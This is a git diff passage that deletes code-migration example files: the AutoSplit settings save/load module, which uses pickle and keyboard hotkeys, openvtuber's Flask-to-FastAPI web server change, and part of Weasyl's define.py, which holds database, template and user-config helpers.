-                                  self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height,
-                                  self.hwnd_title,
-                                  self.custom_pause_times_setting, self.custom_thresholds_setting,
-                                  self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting]
-
-    #one small caveat in this: if you load a settings file from an old version, but don't change settings,
-    #the current save settings and last loaded settings will have a different number of elements, so it will ask
-    #the user to save changes upon closing even though there were none
-    if self.current_save_settings == self.last_loaded_settings or self.current_save_settings == self.last_saved_settings:
-        return False
-    else:
-        return True
-
-def saveSettings(self):
-    if self.last_successfully_loaded_settings_file_path == None:
-        self.saveSettingsAs()
-    else:
-        self.getSaveSettingsValues()
-        self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index,
-                                    self.pause,
-                                    self.fps_limit, self.split_key,
-                                    self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x,
-                                    self.y, self.width, self.height,
-                                    self.hwnd_title,
-                                    self.custom_pause_times_setting, self.custom_thresholds_setting,
-                                    self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting]
-        # save settings to a .pkl file
-        with open(self.last_successfully_loaded_settings_file_path, 'wb') as f:
-            pickle.dump(self.last_saved_settings, f)
-
-def saveSettingsAs(self):
-    # user picks save destination
-    self.save_settings_file_path = str(QtWidgets.QFileDialog.getSaveFileName(self, "Save Settings As", "", "PKL (*.pkl)"))
-
-    #if user cancels save destination window, don't save settings
-    if self.save_settings_file_path == '':
-        return
-
-    self.getSaveSettingsValues()
-    self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause,
-                                self.fps_limit, self.split_key,
-                                self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height,
-                                self.hwnd_title,
-                                self.custom_pause_times_setting, self.custom_thresholds_setting,
-                                self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting]
-
-    # save settings to a .pkl file
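-    # (For reference: pickle round-trips this 20-element list as-is; the
-    # loadSettings() function below keys off the element count -- 20 for
-    # v1.5 files, 18 for v1.3-1.4 files -- to decide how to unpack it.)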
-    with open(self.save_settings_file_path, 'wb') as f:
-        pickle.dump(self.last_saved_settings, f)
-
-    #edge case: even when no settings file has ever been loaded, a successful
-    #Save As must still record the chosen path
-    self.last_successfully_loaded_settings_file_path = self.save_settings_file_path
-
-
-def loadSettings(self):
-    if self.load_settings_on_open == True:
-        self.settings_files = glob.glob("*.pkl")
-        if len(self.settings_files) < 1:
-            self.noSettingsFileOnOpenError()
-            self.last_loaded_settings = None
-            return
-        elif len(self.settings_files) > 1:
-            self.tooManySettingsFilesOnOpenError()
-            self.last_loaded_settings = None
-            return
-        else:
-            self.load_settings_file_path = self.settings_files[0]
-
-    else:
-        self.load_settings_file_path = str(QtWidgets.QFileDialog.getOpenFileName(self, "Load Settings", "", "PKL (*.pkl)"))
-
-    #
-    if self.load_settings_file_path == '':
-        return
-
-    try:
-        with open(self.load_settings_file_path, 'rb') as f:
-            self.settings_count = len(pickle.load(f))
-        #v1.5 settings
-        if self.settings_count == 20:
-            with open(self.load_settings_file_path, 'rb') as f:
-                self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause,
-                                             self.fps_limit, self.split_key,
-                                             self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height,
-                                             self.hwnd_title,
-                                             self.custom_pause_times_setting, self.custom_thresholds_setting,
-                                             self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] = pickle.load(f)
-        #v1.3-1.4 settings. add a blank pause key.
-        elif self.settings_count == 18:
-            with open(self.load_settings_file_path, 'rb') as f:
-                self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause,
-                                             self.fps_limit, self.split_key,
-                                             self.reset_key, self.skip_split_key, self.undo_split_key, self.x, self.y, self.width, self.height,
-                                             self.hwnd_title,
-                                             self.custom_pause_times_setting, self.custom_thresholds_setting,
-                                             self.group_dummy_splits_undo_skip_setting, self.loop_setting] = pickle.load(f)
-            self.pause_key = ''
-            self.auto_start_on_reset_setting = 0
-        elif self.settings_count < 18:
-            self.oldVersionSettingsFileError()
-            return
-
-        self.split_image_directory = str(self.split_image_directory)
-        self.splitimagefolderLineEdit.setText(self.split_image_directory)
-        self.similaritythresholdDoubleSpinBox.setValue(self.similarity_threshold)
-        self.pauseDoubleSpinBox.setValue(self.pause)
-        self.fpslimitSpinBox.setValue(self.fps_limit)
-        self.xSpinBox.setValue(self.x)
-        self.ySpinBox.setValue(self.y)
-        self.widthSpinBox.setValue(self.width)
-        self.heightSpinBox.setValue(self.height)
-        self.comparisonmethodComboBox.setCurrentIndex(self.comparison_index)
-        self.hwnd = win32gui.FindWindow(None, self.hwnd_title)
-
-        # set custom checkboxes accordingly
-        if self.custom_pause_times_setting == 1:
-            self.custompausetimesCheckBox.setChecked(True)
-        else:
-            self.custompausetimesCheckBox.setChecked(False)
-
-        if self.custom_thresholds_setting == 1:
-            self.customthresholdsCheckBox.setChecked(True)
-        else:
-            self.customthresholdsCheckBox.setChecked(False)
-
-        if self.group_dummy_splits_undo_skip_setting == 1:
-            self.groupDummySplitsCheckBox.setChecked(True)
-        else:
-            self.groupDummySplitsCheckBox.setChecked(False)
-
-        if self.loop_setting == 1:
-            self.loopCheckBox.setChecked(True)
-        else:
-            self.loopCheckBox.setChecked(False)
-
-        if self.auto_start_on_reset_setting == 1:
-            self.autostartonresetCheckBox.setChecked(True)
-        else:
-            self.autostartonresetCheckBox.setChecked(False)
-
-        # try to set hotkeys from when user last closed the window
-        try:
-            try:
-                keyboard.remove_hotkey(self.split_hotkey)
-            except AttributeError:
-                pass
-            self.splitLineEdit.setText(str(self.split_key))
-            self.split_hotkey = keyboard.add_hotkey(str(self.split_key), self.startAutoSplitter)
-            self.old_split_key = self.split_key
-        # pass if the key is an empty string (hotkey was never set)
-        except ValueError:
-            pass
-        except KeyError:
-            pass
-
-        try:
-            try:
-                keyboard.remove_hotkey(self.reset_hotkey)
-            except AttributeError:
-                pass
-            self.resetLineEdit.setText(str(self.reset_key))
-            self.reset_hotkey = keyboard.add_hotkey(str(self.reset_key), self.startReset)
-            self.old_reset_key = self.reset_key
-        except ValueError:
-            pass
-        except KeyError:
-            pass
-
-        try:
-            try:
-                keyboard.remove_hotkey(self.skip_split_hotkey)
-            except AttributeError:
-                pass
-            self.skipsplitLineEdit.setText(str(self.skip_split_key))
-            self.skip_split_hotkey = keyboard.add_hotkey(str(self.skip_split_key), self.startSkipSplit)
-            self.old_skip_split_key = self.skip_split_key
-        except ValueError:
-            pass
-        except KeyError:
-            pass
-
-        try:
-            try:
-                keyboard.remove_hotkey(self.undo_split_hotkey)
-            except AttributeError:
-                pass
-            self.undosplitLineEdit.setText(str(self.undo_split_key))
-            self.undo_split_hotkey = keyboard.add_hotkey(str(self.undo_split_key), self.startUndoSplit)
-            self.old_undo_split_key = self.undo_split_key
-        except ValueError:
-            pass
-        except KeyError:
-            pass
-
-        try:
-            try:
-                keyboard.remove_hotkey(self.pause_hotkey)
-            except AttributeError:
-                pass
-            self.pausehotkeyLineEdit.setText(str(self.pause_key))
-            self.pause_hotkey = keyboard.add_hotkey(str(self.pause_key), self.startPause)
-            self.old_pause_key = self.pause_key
-        except ValueError:
-            pass
-        except KeyError:
-            pass
-
-        self.last_successfully_loaded_settings_file_path = self.load_settings_file_path
-        self.checkLiveImage()
-
-    except Exception:
-        self.invalidSettingsError()
-        pass
diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py
deleted file mode 100644
index 5329aaa..0000000
--- a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py
+++ /dev/null
@@ -1,267 +0,0 @@
-from win32 import win32gui
-from PyQt6 import QtWidgets
-import keyboard
-import pickle
-import glob
-
-
-def getSaveSettingsValues(self):
-    # get values to be able to save settings
-    self.x = self.xSpinBox.value()
-    self.y = self.ySpinBox.value()
-    self.width = self.widthSpinBox.value()
-    self.height = self.heightSpinBox.value()
-    self.split_image_directory = str(self.splitimagefolderLineEdit.text())
-    self.similarity_threshold = self.similaritythresholdDoubleSpinBox.value()
-    self.comparison_index = self.comparisonmethodComboBox.currentIndex()
-    self.pause = self.pauseDoubleSpinBox.value()
-    self.fps_limit = self.fpslimitSpinBox.value()
-    self.split_key = str(self.splitLineEdit.text())
-    self.reset_key = str(self.resetLineEdit.text())
-    self.skip_split_key = str(self.skipsplitLineEdit.text())
-    self.undo_split_key = str(self.undosplitLineEdit.text())
-    self.pause_key = str(self.pausehotkeyLineEdit.text())
-
-    if self.custompausetimesCheckBox.isChecked():
-        self.custom_pause_times_setting = 1
-    else:
-        self.custom_pause_times_setting = 0
-
-    if self.customthresholdsCheckBox.isChecked():
-        self.custom_thresholds_setting = 1
-    else:
self.custom_thresholds_setting = 0 - - if self.groupDummySplitsCheckBox.isChecked(): - self.group_dummy_splits_undo_skip_setting = 1 - else: - self.group_dummy_splits_undo_skip_setting = 0 - - if self.loopCheckBox.isChecked(): - self.loop_setting = 1 - else: - self.loop_setting = 0 - - if self.autostartonresetCheckBox.isChecked(): - self.auto_start_on_reset_setting = 1 - else: - self.auto_start_on_reset_setting = 0 - -def haveSettingsChanged(self): - self.getSaveSettingsValues() - self.current_save_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - - #one small caveat in this: if you load a settings file from an old version, but dont change settings, - #the current save settings and last load settings will have different # of elements and it will ask - #the user to save changes upon closing even though there were none - if self.current_save_settings == self.last_loaded_settings or self.current_save_settings == self.last_saved_settings: - return False - else: - return True - -def saveSettings(self): - if self.last_successfully_loaded_settings_file_path == None: - self.saveSettingsAs() - else: - self.getSaveSettingsValues() - self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, - self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, - self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - # save settings to a .pkl file - with open(self.last_successfully_loaded_settings_file_path, 'wb') as f: - pickle.dump(self.last_saved_settings, f) - -def saveSettingsAs(self): - # user picks save destination - self.save_settings_file_path = str(QtWidgets.QFileDialog.getSaveFileName(self, "Save Settings As", "", "PKL (*.pkl)")) - - #if user cancels save destination window, don't save settings - if self.save_settings_file_path == '': - return - - self.getSaveSettingsValues() - self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - - # save settings to a .pkl file - with open(self.save_settings_file_path, 'wb') as f: - pickle.dump(self.last_saved_settings, f) - - #wording is kinda off here but this needs to be here for an edge case: for when a file has never loaded, but you - #save file as successfully. 
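
The deleted AutoSplit settings module above versions its pickle payload purely by list length: 20 values marks a v1.5 file, 18 marks v1.3-1.4 (which predate the pause key and the auto-start flag), and anything shorter is rejected as too old. A minimal standalone sketch of that length-based migration, assuming the field order shown in loadSettings; `load_settings` is an illustrative name, not part of the dataset:

import pickle

def load_settings(path):
    """Load a pickled settings list, padding fields that newer versions added."""
    with open(path, "rb") as f:
        values = pickle.load(f)
    if len(values) == 20:   # v1.5 layout: use as-is
        return values
    if len(values) == 18:   # v1.3-1.4 layout: splice in pause_key ('') after
        return values[:9] + [""] + values[9:] + [0]  # undo_split_key, append auto_start (0)
    raise ValueError("settings file is from an unsupported version")
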
- self.last_successfully_loaded_settings_file_path = self.save_settings_file_path - - -def loadSettings(self): - if self.load_settings_on_open == True: - self.settings_files = glob.glob("*.pkl") - if len(self.settings_files) < 1: - self.noSettingsFileOnOpenError() - self.last_loaded_settings = None - return - elif len(self.settings_files) > 1: - self.tooManySettingsFilesOnOpenError() - self.last_loaded_settings = None - return - else: - self.load_settings_file_path = self.settings_files[0] - - else: - self.load_settings_file_path = str(QtWidgets.QFileDialog.getOpenFileName(self, "Load Settings", "", "PKL (*.pkl)")) - - # - if self.load_settings_file_path == '': - return - - try: - with open(self.load_settings_file_path, 'rb') as f: - self.settings_count = len(pickle.load(f)) - #v1.5 settings - if self.settings_count == 20: - with open(self.load_settings_file_path, 'rb') as f: - self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] = pickle.load(f) - #v1.3-1.4 settings. add a blank pause key. - elif self.settings_count == 18: - with open(self.load_settings_file_path, 'rb') as f: - self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting] = pickle.load(f) - self.pause_key = '' - self.auto_start_on_reset_setting = 0 - elif self.settings_count < 18: - self.oldVersionSettingsFileError() - return - - self.split_image_directory = str(self.split_image_directory) - self.splitimagefolderLineEdit.setText(self.split_image_directory) - self.similaritythresholdDoubleSpinBox.setValue(self.similarity_threshold) - self.pauseDoubleSpinBox.setValue(self.pause) - self.fpslimitSpinBox.setValue(self.fps_limit) - self.xSpinBox.setValue(self.x) - self.ySpinBox.setValue(self.y) - self.widthSpinBox.setValue(self.width) - self.heightSpinBox.setValue(self.height) - self.comparisonmethodComboBox.setCurrentIndex(self.comparison_index) - self.hwnd = win32gui.FindWindow(None, self.hwnd_title) - - # set custom checkbox's accordingly - if self.custom_pause_times_setting == 1: - self.custompausetimesCheckBox.setChecked(True) - else: - self.custompausetimesCheckBox.setChecked(False) - - if self.custom_thresholds_setting == 1: - self.customthresholdsCheckBox.setChecked(True) - else: - self.customthresholdsCheckBox.setChecked(False) - - if self.group_dummy_splits_undo_skip_setting == 1: - self.groupDummySplitsCheckBox.setChecked(True) - else: - self.groupDummySplitsCheckBox.setChecked(False) - - if self.loop_setting == 1: - self.loopCheckBox.setChecked(True) - else: - self.loopCheckBox.setChecked(False) - - if self.auto_start_on_reset_setting == 1: - self.autostartonresetCheckBox.setChecked(True) - else: - self.autostartonresetCheckBox.setChecked(False) - - # try to set hotkeys from when user last closed the window - try: - try: - keyboard.remove_hotkey(self.split_hotkey) - except 
AttributeError: - pass - self.splitLineEdit.setText(str(self.split_key)) - self.split_hotkey = keyboard.add_hotkey(str(self.split_key), self.startAutoSplitter) - self.old_split_key = self.split_key - # pass if the key is an empty string (hotkey was never set) - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.reset_hotkey) - except AttributeError: - pass - self.resetLineEdit.setText(str(self.reset_key)) - self.reset_hotkey = keyboard.add_hotkey(str(self.reset_key), self.startReset) - self.old_reset_key = self.reset_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.skip_split_hotkey) - except AttributeError: - pass - self.skipsplitLineEdit.setText(str(self.skip_split_key)) - self.skip_split_hotkey = keyboard.add_hotkey(str(self.skip_split_key), self.startSkipSplit) - self.old_skip_split_key = self.skip_split_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.undo_split_hotkey) - except AttributeError: - pass - self.undosplitLineEdit.setText(str(self.undo_split_key)) - self.undo_split_hotkey = keyboard.add_hotkey(str(self.undo_split_key), self.startUndoSplit) - self.old_undo_split_key = self.undo_split_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.pause_hotkey) - except AttributeError: - pass - self.pausehotkeyLineEdit.setText(str(self.pause_key)) - self.pause_hotkey = keyboard.add_hotkey(str(self.pause_key), self.startPause) - self.old_pause_key = self.pause_key - except ValueError: - pass - except KeyError: - pass - - self.last_successfully_loaded_settings_file_path = self.load_settings_file_path - self.checkLiveImage() - - except Exception: - self.invalidSettingsError() - pass diff --git a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff b/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff deleted file mode 100644 index 6b53180..0000000 --- a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff +++ /dev/null @@ -1,30 +0,0 @@ -diff --git a/openvtuber-server/src/openvtuber/web/web.py b/openvtuber-server/src/openvtuber/web/web.py - index 6386032f18ac5d45f776c68436e0d70f0e877171..3abbc431e586218470f47eac10fa6d351c6fe907 100644 - --- a/openvtuber-server/src/openvtuber/web/web.py - +++ b/openvtuber-server/src/openvtuber/web/web.py -@@ -1,17 +1,16 @@ - from .config import Configuration as config - --from flask import Flask, send_from_directory -+import uvicorn -+from fastapi import FastAPI -+from fastapi.staticfiles import StaticFiles - from openvtuber import utils - --app = Flask(__name__, static_url_path='') -+app = FastAPI() - -- --@app.route('/openvtuber/') --def serve_pwa(path): -- root = utils.get_project_root() -- abspath = root.joinpath(config.static_files_dir) -- return send_from_directory(abspath, path) -+root = utils.get_project_root() -+abspath = root.joinpath(config.static_files_dir) -+app.mount("/openvtuber", StaticFiles(directory=abspath), name="openvtuber-fastAPI") - - - def run_web_server(): -- app.run(host=config.ip_address, port=config.port, use_reloader=False, debug=True) -+ uvicorn.run(app, host=config.ip_address, port=config.port) diff --git a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py 
b/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py deleted file mode 100644 index c760af5..0000000 --- a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py +++ /dev/null @@ -1,17 +0,0 @@ -from .config import Configuration as config - -from flask import Flask, send_from_directory -from openvtuber import utils - -app = Flask(__name__, static_url_path='') - - -@app.route('/openvtuber/') -def serve_pwa(path): - root = utils.get_project_root() - abspath = root.joinpath(config.static_files_dir) - return send_from_directory(abspath, path) - - -def run_web_server(): - app.run(host=config.ip_address, port=config.port, use_reloader=False, debug=True) diff --git a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py b/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py deleted file mode 100644 index 754ed02..0000000 --- a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py +++ /dev/null @@ -1,16 +0,0 @@ -from .config import Configuration as config - -import uvicorn -from fastapi import FastAPI -from fastapi.staticfiles import StaticFiles -from openvtuber import utils - -app = FastAPI() - -root = utils.get_project_root() -abspath = root.joinpath(config.static_files_dir) -app.mount("/openvtuber", StaticFiles(directory=abspath), name="openvtuber-fastAPI") - - -def run_web_server(): - uvicorn.run(app, host=config.ip_address, port=config.port) diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff deleted file mode 100644 index f6a76c6..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff +++ /dev/null @@ -1,52 +0,0 @@ -diff --git a/weasyl/define.py b/weasyl/define.py - index 97717e00368e9f650dd2daf3493ee76291dc5710..d10cb162447d9e3a9506b76054851863b10ff27a 100644 - --- a/weasyl/define.py - +++ b/weasyl/define.py -@@ -5,7 +5,6 @@ import hashlib - import hmac - import itertools - import json --import logging - import numbers - import datetime - import pkgutil -@@ -17,6 +16,7 @@ import pytz - import requests - import sqlalchemy as sa - import sqlalchemy.orm -+from sentry_sdk import capture_exception - from sqlalchemy.exc import OperationalError - from web.template import Template - -@@ -76,14 +76,6 @@ def connect(): - return sessionmaker() - - --def log_exc(**kwargs): -- """ -- Logs an exception. This is essentially a wrapper around the current request's log_exc. -- It's provided for compatibility for methods that depended on web.ctx.log_exc(). 
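
The openvtuber migration above collapses Flask's per-request `send_from_directory` handler into a single FastAPI `StaticFiles` mount served by uvicorn. A minimal runnable sketch of the same shape; the directory and host/port here are placeholders, not values from the repository:

import uvicorn
from fastapi import FastAPI
from fastapi.staticfiles import StaticFiles

app = FastAPI()
# One mount replaces the Flask route: StaticFiles resolves the request path
# against the directory and serves the matching file directly.
app.mount("/openvtuber", StaticFiles(directory="."), name="openvtuber-fastAPI")

if __name__ == "__main__":
    uvicorn.run(app, host="127.0.0.1", port=8000)
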
-- """ -- return get_current_request().log_exc(**kwargs) -- -- - def execute(statement, argv=None): - """ - Executes an SQL statement; if `statement` represents a SELECT or RETURNING -@@ -981,14 +973,13 @@ def _requests_wrapper(func_name): - func = getattr(requests, func_name) - - def wrapper(*a, **kw): -- request = get_current_request() - try: - return func(*a, **kw) - except Exception as e: -- request.log_exc(level=logging.DEBUG) -+ capture_exception(e, level='info') - w = WeasylError('httpError') - w.error_suffix = 'The original error was: %s' % (e,) -- raise w -+ raise w from e - - return wrapper - diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py deleted file mode 100644 index f50b703..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py +++ /dev/null @@ -1,1087 +0,0 @@ -import os -import time -import random -import hashlib -import hmac -import itertools -import json -import logging -import numbers -import datetime -import pkgutil -from urllib.parse import urlencode, urljoin - -import arrow -from pyramid.threadlocal import get_current_request -import pytz -import requests -import sqlalchemy as sa -import sqlalchemy.orm -from sqlalchemy.exc import OperationalError -from web.template import Template - -import libweasyl.constants -from libweasyl.cache import region -from libweasyl.legacy import UNIXTIME_OFFSET as _UNIXTIME_OFFSET, get_sysname -from libweasyl.models.tables import metadata as meta -from libweasyl import html, text, ratings, security, staff - -from weasyl import config -from weasyl import errorcode -from weasyl import macro -from weasyl.config import config_obj, config_read_setting -from weasyl.error import WeasylError -from weasyl.macro import MACRO_SUPPORT_ADDRESS - - -_shush_pyflakes = [sqlalchemy.orm] - - -reload_templates = bool(os.environ.get('WEASYL_RELOAD_TEMPLATES')) -reload_assets = bool(os.environ.get('WEASYL_RELOAD_ASSETS')) - - -def _load_resources(): - global resource_paths - - with open(os.path.join(macro.MACRO_APP_ROOT, 'build/rev-manifest.json'), 'r') as f: - resource_paths = json.loads(f.read()) - - -_load_resources() - - -def record_timing(func): - return func - - -_sqlalchemy_url = config_obj.get('sqlalchemy', 'url') -if config._in_test: - _sqlalchemy_url += '_test' -engine = meta.bind = sa.create_engine(_sqlalchemy_url, max_overflow=25, pool_size=10) -sessionmaker = sa.orm.scoped_session(sa.orm.sessionmaker(bind=engine, autocommit=True)) - - -def connect(): - """ - Returns the current request's db connection or one from the engine. - """ - request = get_current_request() - if request is not None: - return request.pg_connection - # If there's no threadlocal request, we're probably operating in a cron task or the like. - # Return a connection from the pool. n.b. this means that multiple calls could get different - # connections. - # TODO(hyena): Does this clean up correctly? There's no registered 'close()' call. - return sessionmaker() - - -def log_exc(**kwargs): - """ - Logs an exception. This is essentially a wrapper around the current request's log_exc. - It's provided for compatibility for methods that depended on web.ctx.log_exc(). - """ - return get_current_request().log_exc(**kwargs) - - -def execute(statement, argv=None): - """ - Executes an SQL statement; if `statement` represents a SELECT or RETURNING - statement, the query results will be returned. 
- """ - db = connect() - - if argv: - argv = tuple(argv) - - for x in argv: - if type(x) is not int: - raise TypeError("can't use %r as define.execute() parameter" % (x,)) - - statement %= argv - - query = db.connection().execute(statement) - - if statement.lstrip()[:6] == "SELECT" or " RETURNING " in statement: - return query.fetchall() - else: - query.close() - - -def column(results): - """ - Get a list of values from a single-column ResultProxy. - """ - return [x for x, in results] - - -_PG_SERIALIZATION_FAILURE = u'40001' - - -def serializable_retry(action, limit=16): - """ - Runs an action accepting a `Connection` parameter in a serializable - transaction, retrying it up to `limit` times. - """ - with engine.connect() as db: - db = db.execution_options(isolation_level='SERIALIZABLE') - - for i in itertools.count(1): - try: - with db.begin(): - return action(db) - except OperationalError as e: - if i == limit or e.orig.pgcode != _PG_SERIALIZATION_FAILURE: - raise - - -with open(os.path.join(macro.MACRO_APP_ROOT, "version.txt")) as f: - CURRENT_SHA = f.read().strip() - - -# Caching all templates. Parsing templates is slow; we don't need to do it all -# the time and there's plenty of memory for storing the compiled templates. -_template_cache = {} - - -def _compile(template_name): - """ - Compiles a template file and returns the result. - """ - template = _template_cache.get(template_name) - - if template is None or reload_templates: - _template_cache[template_name] = template = Template( - pkgutil.get_data(__name__, 'templates/' + template_name).decode('utf-8'), - filename=template_name, - globals={ - "STR": str, - "LOGIN": get_sysname, - "TOKEN": get_token, - "CSRF": _get_csrf_input, - "USER_TYPE": user_type, - "DATE": convert_date, - "ISO8601_DATE": iso8601_date, - "TIME": _convert_time, - "LOCAL_ARROW": local_arrow, - "PRICE": text_price_amount, - "SYMBOL": text_price_symbol, - "TITLE": titlebar, - "RENDER": render, - "COMPILE": _compile, - "MARKDOWN": text.markdown, - "MARKDOWN_EXCERPT": text.markdown_excerpt, - "SUMMARIZE": summarize, - "SHA": CURRENT_SHA, - "NOW": get_time, - "THUMB": thumb_for_sub, - "WEBP_THUMB": webp_thumb_for_sub, - "M": macro, - "R": ratings, - "SLUG": text.slug_for, - "QUERY_STRING": query_string, - "INLINE_JSON": html.inline_json, - "PATH": _get_path, - "arrow": arrow, - "constants": libweasyl.constants, - "getattr": getattr, - "json": json, - "sorted": sorted, - "staff": staff, - "resource_path": get_resource_path, - }) - - return template - - -def render(template_name, argv=()): - """ - Renders a template and returns the resulting HTML. 
- """ - template = _compile(template_name) - return str(template(*argv)) - - -def titlebar(title, backtext=None, backlink=None): - return render("common/stage_title.html", [title, backtext, backlink]) - - -def errorpage_html(userid, message_html, links=None, request_id=None, **extras): - return webpage(userid, "error/error.html", [message_html, links, request_id], **extras) - - -def errorpage(userid, code=None, links=None, request_id=None, **extras): - if code is None: - code = errorcode.unexpected - - return errorpage_html(userid, text.markdown(code), links, request_id, **extras) - - -def webpage(userid, template, argv=None, options=None, **extras): - if argv is None: - argv = [] - - if options is None: - options = [] - - page = common_page_start(userid, options=options, **extras) - page.append(render(template, argv)) - - return common_page_end(userid, page, options=options) - - -def get_weasyl_session(): - """ - Gets the weasyl_session for the current request. Most code shouldn't have to use this. - """ - # TODO: This method is inelegant. Remove this logic after updating login.signin(). - return get_current_request().weasyl_session - - -def get_userid(): - """ - Returns the userid corresponding to the current request, if any. - """ - return get_current_request().userid - - -def is_csrf_valid(request, token): - expected = request.weasyl_session.csrf_token - return expected is not None and hmac.compare_digest(str(token), str(expected)) - - -def get_token(): - from weasyl import api - - request = get_current_request() - - if api.is_api_user(request): - return '' - - # allow error pages with $:{TOKEN()} in the template to be rendered even - # when the error occurred before the session middleware set a session - if not hasattr(request, 'weasyl_session'): - return security.generate_key(20) - - sess = request.weasyl_session - if sess.csrf_token is None: - sess.csrf_token = security.generate_key(64) - sess.save = True - return sess.csrf_token - - -def _get_csrf_input(): - return '' % (get_token(),) - - -@region.cache_on_arguments(namespace='v3') -def _get_all_config(userid): - """ - Queries for, and returns, common user configuration settings. - - :param userid: The userid to query. - :return: A dict(), containing the following keys/values: - is_banned: Boolean. Is the user currently banned? - is_suspended: Boolean. Is the user currently suspended? - is_vouched_for: Boolean. Is the user vouched for? - profile_configuration: CharSettings/string. Configuration options in the profile. - jsonb_settings: JSON/dict. Profile settings set via jsonb_settings. 
- """ - row = engine.execute(""" - SELECT EXISTS (SELECT FROM permaban WHERE permaban.userid = %(userid)s) AS is_banned, - EXISTS (SELECT FROM suspension WHERE suspension.userid = %(userid)s) AS is_suspended, - lo.voucher IS NOT NULL AS is_vouched_for, - pr.config AS profile_configuration, - pr.jsonb_settings - FROM login lo INNER JOIN profile pr USING (userid) - WHERE userid = %(userid)s - """, userid=userid).first() - - return dict(row) - - -def get_config(userid): - """ Gets user configuration from the profile table (profile.config)""" - if not userid: - return "" - return _get_all_config(userid)['profile_configuration'] - - -def get_login_settings(userid): - """ Returns a Boolean pair in the form of (is_banned, is_suspended)""" - r = _get_all_config(userid) - return r['is_banned'], r['is_suspended'] - - -def is_vouched_for(userid): - return _get_all_config(userid)['is_vouched_for'] - - -def get_profile_settings(userid): - from weasyl.profile import ProfileSettings - - if not userid: - jsonb = {} - else: - jsonb = _get_all_config(userid)['jsonb_settings'] - - if jsonb is None: - jsonb = {} - - return ProfileSettings(jsonb) - - -def get_rating(userid): - if not userid: - return ratings.GENERAL.code - - if is_sfw_mode(): - profile_settings = get_profile_settings(userid) - - # if no explicit max SFW rating picked assume general as a safe default - return profile_settings.max_sfw_rating - - config = get_config(userid) - if 'p' in config: - return ratings.EXPLICIT.code - elif 'a' in config: - return ratings.MATURE.code - else: - return ratings.GENERAL.code - - -# this method is used specifically for the 